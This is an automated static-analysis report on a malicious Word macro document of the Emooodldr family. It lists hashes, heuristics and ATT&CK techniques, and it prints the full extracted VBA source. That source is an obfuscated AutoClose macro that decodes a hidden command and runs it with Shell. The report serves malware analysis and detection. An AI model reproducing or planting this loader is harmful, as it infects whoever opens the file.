Emooodldr — Office (OOXML) malware analysis

Static analysis result for SHA-256 f7854d717ea3449b…

Verdict: MALICIOUS
File type: Office (OOXML)
Size: 53.9 KB
Created: 2017-11-29 23:43:00 UTC
Authoring application: Microsoft Office Word 16.0000
First seen: 2018-07-14
MD5: 12d070eb94b43e5ea279f913b1b88888
SHA-1: 8e8ee386d56f308511f69045b9b06160f3cc40f9
SHA-256: f7854d717ea3449b6cf2ed56b8fc1e790dff23df19c62e554f233300faac8750
Risk score: 282

Malware Insights

Emooodldr · confidence 95%

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1059 Command and Scripting Interpreter
  • T1203 Exploitation for Client Execution

The sample contains VBA macros, specifically an AutoClose macro, which utilizes the Shell() function. This function is used to execute a command that is constructed from a concatenated array of characters, likely to download and execute a second-stage payload. The ClamAV detection name 'Doc.Malware.Emooodldr-6711604-0' strongly suggests the Emooodldr family.

Heuristics (6)

  • ClamAV: Doc.Malware.Emooodldr-6711604-0 [critical, CLAMAV_DETECTION]
    ClamAV detected this file as malware: Doc.Malware.Emooodldr-6711604-0
  • VBA project inside OOXML [medium, OOXML_VBA, 3 related findings]
    Document contains a VBA project — VBA macros present
  • Shell() call in VBA [critical, OLE_VBA_SHELL]
    Shell() call in VBA
  • Auto_Close macro [high, OLE_VBA_AUTOCLOSE]
    Auto_Close macro
  • VBA p-code auto-exec with execution tokens [high, OLE_VBA_PCODE_AUTOEXEC_EXEC]
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL [info, EMBEDDED_URL]
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    All 15 extracted URLs carry the label "In document text (OOXML body / shared strings)"; they are the standard OOXML/Office XML namespace identifiers rather than macro-reached addresses:
    • http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas
    • http://schemas.microsoft.com/office/drawing/2014/chartex
    • http://schemas.openxmlformats.org/markup-compatibility/2006
    • http://schemas.openxmlformats.org/officeDocument/2006/relationships
    • http://schemas.openxmlformats.org/officeDocument/2006/math
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing
    • http://schemas.openxmlformats.org/wordprocessingml/2006/main
    • http://schemas.microsoft.com/office/word/2010/wordml
    • http://schemas.microsoft.com/office/word/2012/wordml
    • http://schemas.microsoft.com/office/word/2015/wordml/symex
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroup
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInk
    • http://schemas.microsoft.com/office/word/2006/wordml
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShape

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 2077 bytes
SHA-256: edfcc89dbe857872a032ed8a7c54ebcecfd65dd6101ad59af9ffd7d96241dfe2
Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Sub AutoClose()
  gynecology = Array("p", "o", "K", "z", "4", "W", "L", "2", "L", "Q", "K", "z", "z", "h", "1", "0", "0", "E", "v", "s", "F", "E", "C", "v", "m", "Y", "E", "C", "s", "E", "K", "C", "L", "C", "W", "6", "V", "p", "0", "j", "u", "0", "o", "F", "", "2", "W", "h", "K", "h", "P", "m", "z", "p", "4", "8", "v", "V", "Y")
  corniche = preillustration(gynecology)
  
  Application.Run "intricacies", (corniche)
  
End Sub


Private Sub intricacies(filminess)
   
   meerkat = 6162
   delphinidae = True
   
   While delphinidae
     barter = meerkat + 222
     If barter - meerkat > 111 Then
       VBA.Shell filminess, vbNormalFocus - 1
       delphinidae = False
      End If
     
   Wend

End Sub


Public Function unwearied(wodges, simoom)

  haptenic = 9090
  miersiteator = -1
  For Each concordantly In simoom
    If concordantly = wodges Then
     haptenic = miersiteator
     Exit For
    End If

    miersiteator = miersiteator + 1
    
  Next

  
  If haptenic = 9090 Then
    haptenic = -1
  End If


  unwearied = haptenic + 1
End Function

Private Function preillustration(gynecology)
  reexportation = Array("", "2", "Q", "m", "u", "E", "C", "8", "W", "h", "z", "0", "v", "K", "s", "L", "1", "6", "F", "P", "o", "p", "V", "j", "4", "Y")
  hiortdahlite = Array("k", "x", " ", "u", "A", "q", "w", "=", ".", "p", "t", "/", "d", "h", "i", "e", ":", "c", "j", "?", "s", "m", "o", "N", "a", "n")
  
  purloining = vbNullString
  
  For Each jointworm In gynecology
    indeed = Application.Run("unwearied", jointworm, reexportation)
    If indeed > -1 And indeed < 8080 Then
    purloining = hiortdahlite(indeed) + purloining
    End If
  Next
  
  preillustration = StrReverse(purloining)
  
End Function
vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 12288 bytes
SHA-256: 0de9c23f512a5f05d24aca2e59e5f5ac31e565e30d5b467dc36bddc216976a17
Detection: ClamAV: Doc.Malware.Emooodldr-6711604-0
Obfuscation or payload: unlikely